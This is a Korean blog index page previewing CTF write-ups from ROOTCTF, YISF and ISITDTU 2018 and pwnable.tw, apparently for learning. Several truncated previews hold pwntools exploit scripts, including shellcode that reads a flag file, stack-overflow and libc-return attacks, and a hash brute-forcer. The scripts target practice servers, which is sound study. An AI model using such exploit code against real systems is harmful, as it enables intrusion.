본문 바로가기

전체 글

(171)
[ROOTCTF 2018] Write up Pwnable - S3CretD00r (932pt) Reversing - ROOT Login (990pt) Reversing - CrackMe (957pt) Reversing - MyLocker (990pt) 안녕하세요 ROOTCTF 2018 S3CretD00r, ROOT Login, CrackMe, MyLocker 출제자입니다. ROOTCTF에 참가해주신 참가자분들께 조금이라도 도움이 되고자 풀이를 공유합니다. Pwnable - S3CretD00r (932pt) 먼저 Pwnable S3CretD00r 문제입니다. 해당 문제의 컨셉은 Custom Canary입니다. 해당 함수에서 Custom Canary를 생성하는 코드를 볼 수 있습니다. 후에 Game을 시작하면 다음과 같이 가위바위보를 하는 코드를 목..
Project_Ransomware 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 12..
YISF 2018 final 못푼거misc png 문제 (품)misc 이진 (풀거같음)reversing 500점 app (품)Web 500점 base64 php 소스 긁어와서 품 (공부)pwnable 500점 버퍼오버플로우는 찾았는데 fsb 가 있었음 sprintf에서 카나리 릭하면됨 (공부) 푼거forensic 500 (mysql 비번 지우고 가서 select * from 테이블명 where flagtruechar = 1 치면 플래그 긁어와짐)pwnable 1000 (은행에서 6만원 얻고 머니 -6만원 되면 게임져서 0원 된다음 3천원 복귀 후 돈 바꾸고 RTL 익스) misc_png_solve\x78\x9c 로 시작함 zlib은010 editor로 보면 png 하나하나에 zlib로 압축되어 있음.그거 밑에 처럼 디컴파일 한다음에..
YISF 2018 예선 Write up Misc - 50, 100, 150 Forensic - 50, 100 Web - 50 Pwnable - 50 Reversing - 50, 100
[pwnable.tw] applestore 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758from pwn import * def add(n): r.sendlineafter("> ", '2') r.sendlineafter("Number> ", str(n)) r = remote('chall.pwnable.tw', 10104)#r = process("./applestore")e = ELF("./applestore")#libc = ELF("/lib/i386-linux-gnu/libc.so.6")libc = ELF("./libc_32.so.6") for i in range(6): add(1)for i in ran..
[ISITDTU CTF 2018] write up ISITDTU CTF 2018 Quals Write up [Reversing] coolimport hashlib def hash(): s = ['ECFD4245812B86AB2A878CA8CB1200F9'.lower(), '88E3E2EDB64D39698A2CC0A08588B5FD'.lower(), 'BBC86F9D0B90B9B08D1256B4EF76354B'.lower()] bf_table = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz!@#$^*():_-?{}" tmp = [0, 0, 0] for a in bf_table: for b in bf_table: for c in bf_table: for d in bf_table: md =..
[pwnable.tw] orw 1234567891011121314from pwn import * r = remote('chall.pwnable.tw', 10001)context(arch='i386', os='linux') sm = ''sm += shellcraft.open('/home/orw/flag') sm += shellcraft.read(3, 'esp', 50) sm += shellcraft.write(1, 'esp', 50) sm += shellcraft.exit() r.sendlineafter(':', asm(sm)) r.interactive()Colored by Color Scriptercs
[pwnable.tw] silver_bullet 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960from pwn import * s = remote('chall.pwnable.tw', 10103)#s = process('./silver_bullet')e = ELF('./silver_bullet')libc = ELF('libc_32.so.6') pr = 0x8048475one = 0x5fbc5 s.sendlineafter('choice :', '1')s.sendafter('bullet :', 'A'*0x2f + '\x00') s.sendlineafter('choice :', '2')s.sendafter('..